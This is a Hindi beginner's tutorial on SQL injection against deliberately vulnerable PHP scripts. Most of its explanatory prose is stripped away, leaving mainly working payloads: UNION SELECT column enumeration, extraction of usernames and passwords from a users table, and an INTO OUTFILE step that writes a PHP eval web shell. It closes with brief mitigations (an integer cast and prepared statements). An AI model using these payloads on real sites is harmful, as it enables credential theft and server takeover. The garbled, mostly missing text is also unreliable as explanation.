शुरुआती के लिए एसक्यूएल इंजेक्शन। भाग 1

आपको नमस्कार, पाठक। हाल ही में, मैं वेब सुरक्षा का शौकीन रहा हूं, और कुछ हद तक, काम इसके साथ जुड़ा हुआ है। क्योंकि मैंने विभिन्न मंचों में विषयों को अधिक से अधिक बार नोटिस करना शुरू किया, यह दिखाने के लिए कि यह सब कैसे काम करता है, मैंने एक लेख लिखने का फैसला किया। लेख उन लोगों के लिए डिज़ाइन किया जाएगा जिन्होंने इसका सामना नहीं किया है, लेकिन सीखना चाहते हैं। इस विषय पर नेटवर्क के बहुत सारे लेख हैं, लेकिन शुरुआती लोगों के लिए वे थोड़े जटिल हैं। मैं स्पष्ट भाषा और विस्तृत उदाहरणों में हर चीज का वर्णन करने की कोशिश करूंगा।

प्रस्तावना

इस लेख को समझने के लिए, आपको वास्तव में SQL भाषा के ज्ञान की आवश्यकता नहीं है, लेकिन कम से कम अच्छे धैर्य और थोड़ा मस्तिष्क की उपस्थिति - याद रखने के लिए।

मेरा मानना ​​है कि लेख का एक पढ़ना पर्याप्त नहीं होगा, क्योंकि हमें जीवित उदाहरणों की आवश्यकता है - जैसा कि आप जानते हैं, संस्मरण की प्रक्रिया में, यह कभी नहीं होता है। इसलिए, हम कमजोर स्क्रिप्ट लिखेंगे और उन पर प्रशिक्षण देंगे।

SQL इंजेक्शन क्या है?

— , , . :

, , 100 . SQL , :
100

- ( ), , — . , , « » :
100

, , 100 . SQL :) ( ), .

, . . cfg.php

SQL injection

, , . — ID. . GET/POST Cookie!

---

index1.php. , ID .

sqlinj/index1.php?id=1'

.. :

$id = $_GET['id'];
$query = "SELECT * FROM news WHERE id=$id";

SELECT * FROM news WHERE id=1'

:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\WebServ\domains\sqlinj\index1.php on line 16

— :

1.SQL — , (int)
2. .

— ! SQL — .

---

index2.php. , :

$user = $_GET['user'];
$query = "SELECT * FROM news WHERE user='$user'";

, — .
:

sqlinj/index2.php?user=AlexanderPHP'

. ! . — .

---

- , . , " -- " SQL.

! . URL %20

, — :
SELECT * FROM news WHERE user='AlexanderPHP' -- habrahabra

. index2.php, :

sqlinj/index2.php?user=AlexanderPHP'%20--%20habrahabr

---

UNION. SQL UNION SQL- . , - .

---

«», . index1.php.

sqlinj/index1.php?id=1 UNION SELECT 1. :
SELECT * FROM news WHERE id=1 UNION SELECT 1
, .. , .

.. , , .

, :
sqlinj/index1.php?id=1 UNION SELECT 1,2
…
sqlinj/index1.php?id=1 UNION SELECT 1,2,3
!
sqlinj/index1.php?id=1 UNION SELECT 1,2,3,4,5
! 5.

GROUP BY

, 20 40 60. , GROUP BY


sqlinj/index1.php?id=1 GROUP BY 2
, - 2. :

sqlinj/index1.php?id=1 GROUP BY 8
, , - 8.

GROUP BY 4 , GROUP BY 6 — , - 5

---

, , ID, :

sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5


, , . , , .

---

, users id, name pass.
ID=1

:

sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM users WHERE id=1



, , 1 3

sqlinj/index1.php?id=-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1
— !

---

« », index2.php . :
sqlinj/index2.php?user=-1' UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 --%20

---

/

, FILE_PRIV.

. , OUTFILE .
sqlinj/index2.php?user=-1' UNION SELECT 1,2,3,4,5 INTO OUTFILE '1.php' --%20
, . , -:
sqlinj/index2.php?user=-1' UNION SELECT 1,'<?php eval($_GET[1]) ?>',3,4,5 INTO OUTFILE '1.php' --%20

---

, . LOAD_FILE, , :

sqlinj/index2.php?user=-1' UNION SELECT 1,LOAD_FILE('1.php'),3,4,5 --%20

, .

---

, . . ,

$id = (int) $_GET['id'];

malroc. PDO prepared statements.

---

«SQL injection ». . .
, .